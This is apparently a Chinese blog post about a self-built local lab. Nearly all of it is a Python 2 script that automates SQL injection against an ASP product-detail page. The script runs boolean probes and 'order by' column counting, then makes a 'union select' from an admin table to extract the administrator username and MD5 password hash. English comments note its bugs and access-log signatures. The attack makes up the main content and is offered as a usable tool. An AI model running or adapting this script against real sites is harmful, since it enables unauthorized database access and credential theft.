由于是对自己搭建的环境进行测试，所以觉得很僵硬；并且这个程序还没有爆破的功能，联合查询时只能用常用的 admin、password，这点以后有时间可以改进。
注入点:
http://127.0.0.1:81/0/Production/PRODUCT_DETAIL.asp?id=1513
上代码吧:
#coding:utf-8
# Python 2 script (print statements, bare except). It sends a sequence of
# plain GET requests to the hard-coded local test URL below with a payload
# appended to the query string, so every step is visible verbatim in the
# web server's access log.
import requests
import re
s=requests.session()  # only order_by() uses the session; the other calls use requests.get directly
# NOTE: the literal ends with a trailing space so that the suffixes appended
# below ('order by N', 'union select ...') are separated from the id value.
url1='http://127.0.0.1:81/0/Production/PRODUCT_DETAIL.asp?id=1513 '
def order_by(url1):  # determine how many columns the query selects
    # Appends 'order by N' for N = 1..99 and returns the first N whose
    # response status is not 200; the column count the rest of the script
    # works with is therefore N-1 (which is why biaodashi() iterates
    # range(2, j)). Returns None if all 99 requests succeed -- the caller then
    # passes None to range() and the resulting error is swallowed by the bare
    # except at the bottom of the file.
    for i in range(1,100):
        url = url1+'order by '+str(i)
        r=s.get(url,timeout=2)  # the only request in this file with a timeout
        if r.status_code!=200:
            return i
            break  # unreachable: the return above already exits the function
def point_(url1):  # check whether the parameter looks injectable
    # Boolean-based check: fetches the page with ' and 1=1' and ' and 1=2'
    # appended and compares only the two HTTP status codes (not the bodies).
    # Returns 1 when they differ; otherwise falls through and returns None.
    # Detection note: two requests differing only in '1=1' / '1=2' within a
    # short window are a classic injection-probe signature in access logs.
    url_t=url1+' and 1=1'
    url_f=url1+' and 1=2'
    r1=requests.get(url_t)  # no timeout: a hanging server blocks the script indefinitely
    r2=requests.get(url_f)
    if r1.status_code!=r2.status_code:
        print '存在注入'
        return 1
def biaodashi(url1,j):  # build the comma-separated column list '1,2,...,j-1'
    # url1 is accepted but never used. The assignment f=1 before the loop is
    # dead: the loop rebinds f immediately, and f is not read afterwards.
    key='1'
    f=1
    for f in range(2,j):
        key=key+','+str(f)
    return key
try:
    if point_(url1)==1:
        # Rebinding order_by / biaodashi to their results shadows the two
        # functions for the rest of the process.
        order_by=order_by(url1=url1)
        biaodashi=biaodashi(url1=url1,j=order_by)
        yuju='union select '+biaodashi+' from admin'
        url=url1+yuju
        r=requests.get(url).content
        # The table cell the script scrapes looks like:
        # <td height="20" width="663">3</td>
        # L1 is whatever the page echoes in that cell (the column number).
        pattern=re.compile('<td height="20" width="663">(.*?)</td>')
        L1=re.search(pattern,r).group(1)  # raises AttributeError (swallowed below) when the cell is absent
        # str.replace substitutes every occurrence of ','+L1, not only the
        # intended column (e.g. ',1' also matches the prefix of ',10').
        sql=url.replace(','+L1,',admin')
        r = requests.get(sql).content
        pattern = re.compile('<td height="20" width="663">(.*?)</td>')  # same pattern as above; the recompile is redundant
        username= re.search(pattern, r).group(1)
        print 'username:'+username
        sql2=url.replace(','+L1,',password')
        r = requests.get(sql2).content
        password=re.search(pattern, r).group(1)
        print 'password:'+password+'------(md5)'
    else:
        print '不存在注入点'
except:
    # Bare except: connection errors, a None returned by order_by(), and
    # re.search() returning None (AttributeError on .group) are all silently
    # discarded, so a failed run is indistinguishable from one that produced
    # no output.
    pass